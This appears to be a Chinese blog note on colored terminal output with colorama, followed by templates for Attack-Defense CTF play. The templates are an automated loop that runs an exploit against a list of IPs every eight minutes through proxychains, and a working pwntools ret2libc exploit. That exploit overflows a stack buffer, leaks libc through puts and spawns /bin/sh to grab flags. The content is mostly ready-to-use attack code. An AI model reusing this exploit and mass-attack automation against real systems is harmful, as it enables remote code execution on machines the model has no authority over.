1 使用colorama库带颜色输出日志
#!/usr/bin/env python
#encoding: utf-8
from colorama import init, Fore, Back, Style
if __name__ == "__main__":
init(autoreset=True) # 初始化,并且设置颜色设置自动恢复
print(Fore.RED + 'some red text')
print(Back.GREEN + 'and with a green background')
print(Style.DIM + 'and in dim text')
# 如果未设置autoreset=True,需要使用如下代码重置终端颜色为初始设置
#print(Fore.RESET + Back.RESET + Style.RESET_ALL) autoreset=True
print('back to normal now')
2 pwn awd模板
awd模式千万不要使得单个脚本功能太过庞大,脚本很容易出现问题,而且调试起来很麻烦,建议将flag提交脚本和exp实现脚本分开,下面提供简单模板:
flag提交
#coding:utf-8
import re
import os
import requests
from colorama import init, Fore, Back, Style
import time
init(autoreset=True)
isSubmit = False
def searchflag(str1):
pattern = "(\w+-)+\w+"
m = re.search(pattern,str1)
return m
def exp(ip,token):
cmd = "proxychains python {src} {ip} {token}".format(src = "exp.py",ip = ip,token = token)
os.system(cmd)
'''
def get_token():
with open("token.txt") as f:
a=f.read()
return a
'''
def login(username,password):
pass
def submit(flag):
pass
def do(ip):
token = get_token()
try:
exp(ip,token)
print(Fore.GREEN+"[+] success link! :ip-> {ip} ,token-> {token}".format(ip = ip,token =token))
if isSubmit:
with open("flag","r") as f:
flag = f.read().strip()
submit(flag)
except Exception as e:
print(Back.RED+"error:" + ip +"\n" +repr(e))
#raise e
iplist = []
import time
if __name__ =="__main__":
while True:
for ip in iplist:
do(ip)
t = time.strftime("%H:%M:%S",time.localtime())
print(Back.YELLOW + "nowtime : {t}".format(t= t))
hour = t.split(":")[0]
if int(hour) >= 9:
break
time.sleep(8*60)
exp书写格式:
#coding:utf-8
from pwn import *
import sys
import re
from colorama import init, Fore, Back, Style
init(autoreset=True)
debug = False
def searchflag(str1):
pattern = "(\w+-)+\w+"
m = re.search(pattern,str1)
return m
if debug:
context(arch="x86_64",os = "linux",log_level="debug")
p = process("./3pwn")
else:
ip = sys.argv[1]
token = sys.argv[2]
context(arch="x86_64",os = "linux",timeout = 20)
p = remote(ip, 9999)
#pwnlib.gdb.attach(proc.pidof(p)[0])
elf = ELF("./king-of-glory")
libc = ELF("libc.so")
def buy_medicine():
p.sendline("4")
p.sendline("1")
p.recvuntil("want: ")
p.sendline("9"*16)
p.sendline("4")
p.sendline("1")
p.recvuntil("want: ")
p.sendline("9"*16)
p.sendline("4")
p.sendline("1")
p.recvuntil("want: ")
p.sendline("9"*16)
p.sendline("4")
p.sendline("1")
p.recvuntil("want: ")
p.sendline("9"*16)
p.sendline("3")
p.recv()
buy_medicine()
def UnlimiedMoneyWorks(idx):
p.sendline("9")
p.recvuntil("name?\n")
p.sendline("a"*69)
#p.sendline(name)
p.recv()
p.sendline(idx)
vul_addr = 0x400B88
pop_rdi_ret = 0x0000000000401403
payload = "a"*0xB0 + p64(0xdeadbeef)
payload+=p64(pop_rdi_ret)+p64(elf.got["puts"]) +p64(elf.sym["puts"])+p64(vul_addr)
UnlimiedMoneyWorks(payload)
def get_addr():
return u64(p.recvuntil("\x7f")[-6:].ljust(8,"\0"))
libc_puts = get_addr()
libc_base = libc_puts - libc.sym["puts"]
#success("libc_puts -> {:#x}".format(libc_puts))
#success("libc_base -> {:#x}".format(libc_base))
libc_system = libc_base + libc.sym["system"]
libc_binsh = libc_base + libc.search("/bin/sh").next()
#success("libc_system -> {:#x}".format(libc_system))
#success("libc_binsh -> {:#x}".format(libc_binsh))
payload = "a"*0xB0 + p64(0xdeadbeef) + p64(pop_rdi_ret) + p64(libc_binsh)+p64(libc_system)
p.sendline(payload)
p.recv()
#p.sendline("cat flag.txt")
p.sendline("\ngetflag")
flag = p.recv()
m = searchflag(flag)
if m:
flag = m.group()
success(Back.GREEN +"ip -> {ip},token -> {token},flag -> {flag} ".format(ip =ip,token = token,flag = flag))
#cmd = "echo {0} >>token".format(token)
cmd = "hereiam -t {token}".format(token = token)
p.sendline(cmd)
p.sendline("exit")
#p.send("\n\n")
p.close()
with open("flag","w") as f:
f.write(flag)
else:
print(Back.RED+"[-] failed!!! can't get flag from {0}".format(ip))
p.close()